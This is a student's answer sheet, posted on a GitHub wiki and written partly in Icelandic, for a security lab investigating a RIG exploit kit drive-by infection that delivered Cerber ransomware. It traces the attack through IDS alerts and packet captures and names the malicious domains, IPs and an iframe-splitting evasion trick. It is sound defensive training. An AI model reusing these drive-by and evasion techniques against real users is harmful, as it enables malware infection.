27.2.15 Lab Investigate a Malware Exploit - PanamaP/KEST3CO05DU GitHub Wiki
Look at the expanded alert details and answer the following questions: Questions: What is the time of the first detected NIDS alert in Kibana?
Jan 27 2017, 22:54:43.000
What is the source IP address in the alert?
172.16.4.193:49202
What is the destination IP address in the alert?
194:87:234:129:80
What is the destination port in the alert? What service is this?
80, http.
What is the classification of the alert?
trojan-activity
What is the destination geo country name?
Rússland
What is the malware family for this event?
Exploit_Kit_RIG
What is the severity of the exploit?
Major
What is an Exploit Kit? (EK) Search on the internet to answer this question
Exploit kit is toolkit cybercriminals use to attack vulnerabilities in systems so they can distribute malware or perform other malicious activities
What website did the user intend to connect to?
What URL did the browser refer the user to?
tyu.benme.com
What kind of content is requested by the source host from tybenme.com? Why could this be a problem?
gzip file, það er líklegast vírus
Scroll down to the HTTP - Sites section of the dashboard. Question: What are some of the websites that are listed?
www.homeimprovement.com retrotip.visionurbana.com.ve tyu.benme.com spotsbill.com fpdownload2.macromedia.com api.blockcypher.com
Which of these sites is likely part of the exploit campaign?
www.homeimprovement.com retrotip.visionurbana.com.ve tyu.benme.com spotsbill.com
What are the HTTP - MIME Types listed in the Tag Cloud?
text/plain, text/html, application/javascript, text/json, image/png, image/x-icon, application/x-shockwave-flash, application/vnd.ms-fontobject
Locate the group of alerts from January 27th 2017. Question: According to Sguil, what are the timestamps for the first and last of the alerts that occurred within about a second of each other?
22:54:42 - 22:55:28
Select the alert ID 5.2 (Event message ET CURRENT Evil Redirector Leading to EK Jul 12 2016). Question: According to the IDS signature rule which malware family triggered this alert? You may need to scroll through the alert signature to find this entry.
PsuedoDarkLeech
Maximize the Sguil window and size the Event Message column so that you can see the text of the entire message. Look at the Event Messages for each of the alert IDs related to this attack. Questions: According to the Event Messages in Sguil what exploit kit (EK) is involved in this attack?
RIG EK
Beyond labelling the attack as trojan activity, what other information is provided regarding the type and name of the malware involved?
Ransomware/Cerber
By your best estimate looking at the alerts so far, what is the basic vector of this attack? How did the attack take place?
einhver tengdist vefsíðu
What are the referer and host websites that are involved in the first SRC event? What do you think the user did to generate this alert?
Notandi notaði bing.com til að leita af home improvement remodeling your kitchen og ýtti síðan á www.homeimprovement.com sýktu síðuna.
Refer to the transcript and answer the following questions: Questions: What kind of request was involved?
GET HTTP/1.1
Were any files requested?
dle_js.js
What is the URL for the referer and the host website?
referer - www.homeimprovement.com/remodeling-your-kitchen-cabinets.html host - retrotip.visionurbana.com.ve
How the content encoded?
gzip
Close the current transcript window. In the Sguil window, right-click the alert ID 5.25 (Event Message ET CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2) and open the transcript. According to the information in the transcript answer the following questions:
How many requests and responses were involved in this alert?
3 requests og 3 responses.
What was the first request?
GET HTTP/1.1
Who was the referrer?
www.homeimprovement.com/remodeling-your-kitchen-cabinets.html
Who was the host server request to?
tyu.benme.com
Was the response encoded?
Já, gzip
What was the second request?
POST, HTTP/1.1
Who was the host server request to?
tyu.benme.com
Was the response encoded?
Já, gzip
What was the third request?
GET HTTP/1.1
Who was the referrer?
tyu.benme.com
What was the Content-Type of the third response?
application/x-shockwave-flash
What were the first 3 characters of the data in the response? The data starts after the last DST: entry
CWS
CWS is a file signature. File signatures help identify the type of file that is represented different types of data. Go to the following website https://en.wikipedia.org/wiki/List_of_file_signatures. Use Ctrl-F to open a find box. Search for this file signature to find out what type of file was downloaded in the data. Question: What type of file was downloaded? What application uses this type of file?
flash .swf, Adobe Flash notar það.
Right-click the same ID again and choose Network Miner. Click the Files tab. Question: How many files are there and what is the file types?
3, html og swf
Select the first packet. In the packet details area, expand the Hypertext Transfer Protocol application layer data. Question: What website directed the user to the www.homeimprovement.com website?
Bing.com
Close Wireshark. In Sguil, right-click the alert ID 5.24 (source IP address 139.59.160.143 and Event Message ET CURRRENT_EVENTS Evil Redirector Leading to EK March 15 2017) and choose Wireshark to pivot to Wireshark. Apply an http.request display filter and answer the following questions:
What is the http request for?
GET dle_js.js
What is the host server?
retrotip.visionurbana.com.ve
Investigate the Detection and Details tabs. Review the information that is provided on this hash value. Question: What did VirusTotal tell you about this file?
að 32 af 59 vírusvörnum töldu þetta vera vírus. Þetta er RIG EK exploit fyrir adobe flash.
Close the browser and Wireshark. In Sguil, use alert ID 5.37 (Event Message ET CURRENT_EVENTS RIG EK Landing Sep 12 2016 T2) to pivot to Wireshark and examine the HTTP requests. Questions: Are there any similarities to the earlier alerts?
Sama sýkta síða og sami host
Are the files similar? Do you see any differences?
Sama setup, tvö html og eitt sfw það bara heitir annað
Create a SHA-1 hash of the SWF file as you did previously. Question: Is this the same malware that was downloaded in the previous HTTP session?
Já sama hash.
In Sguil, the last 4 alerts in this series are related, and they also seem to be post-infection. Questions: Why do they seem to be post-infection?
það er verið að hafa samband við vírus host
What is interesting about first alert in the last 4 alerts in the series?
Það sendir skilaboð með udp á vírus serverin sem er í frakklandi
What type of communication is taking place in the second and third alerts in the series and what makes it suspicious?
Það er að senda dns pakka á p27dokhpz2n7nvgr.1jw2lx.top
Go to virustotal.com and do a URL search for the .top domain used in the attack. Question: What is the result?
4/71 vírusvörnum láta vita að þetta malicious domain
Examine the last alert in the series in Wireshark. If it has any objects worth saving, export and save them to your home folder. Question: What are the filenames if any?
EE7E-AD39-7D8C-080C-18BF?iframe....
In Security Onion, open the remodeling-your-kitchen-cabinets.html file using your choice of text editor. This webpage initiated the attack. Question: Can you find the two places in the webpage that are part of the drive-by attack that started the exploit?
dle_js.js er loadað í head og í body er iframe tyu.benme.com loadað
What does the file do?
document.write sem býr til iframe sem tekur notanda a tyu.benme.com
How does the code in the javascript file attempt to avoid detection?
með því að skipta upp lokuninni "</ifr' + 'ame>"
In a text editor, open the text/html file that was saved to your home folder with Vivaldi as part of the filename. Examine the file and answer the following questions: Questions: What kind of file it is?
html
What are some interesting things about the iframe? Does it call anything?
það er falið en kallar á start() function
What does the start() function do?
það finnur út hvaða browser notandin er að nota í gegnum getBrowser() function og býr svo til form sem sendir NormalURL(tyu.benme.com) í POST
What do you think the purpose of the getBrowser() function is?
Til að finna út hvaða browser notandi er að nota
The EK used a number of websites. Complete the table below. URL IP Address Function www.bing.com N/A search engine links to legitimate webpage www.homeimprovement.com 104.28.18.74 iFrame sem tekur þig á malicious vefsíðu retrotip.visionurbana.com.ve 139.59.160.143 startar malicious javascript fileinu tyu.benme.com 194.87.234.129 sendir malicious Adobe Flash skjal(swf) n/a 90.2.10.0 hefur samband við Cerber ransomware serverinn p27dokhpz2n7nvgr.1jjw2lx.top 198.105.151.50 cerber ransomware síðan
It is useful to “tell the story” of an exploit to understand what happened and how it works. Start with the user searching the internet with Bing. Search the web for more information on the RIG EK to help.
Einhver notandi vill breyta til heima hjá sér og fer á bing og leitar eftir home improvements remodeling, notandi ýtir síðan á vefsíðu. Javascript skjal loadast og sækir það malicious adobe flash skjal. flash skjalið opnast og niðurhalar cerber vírisinum sem hefur síðan samskipti við cerber serverin.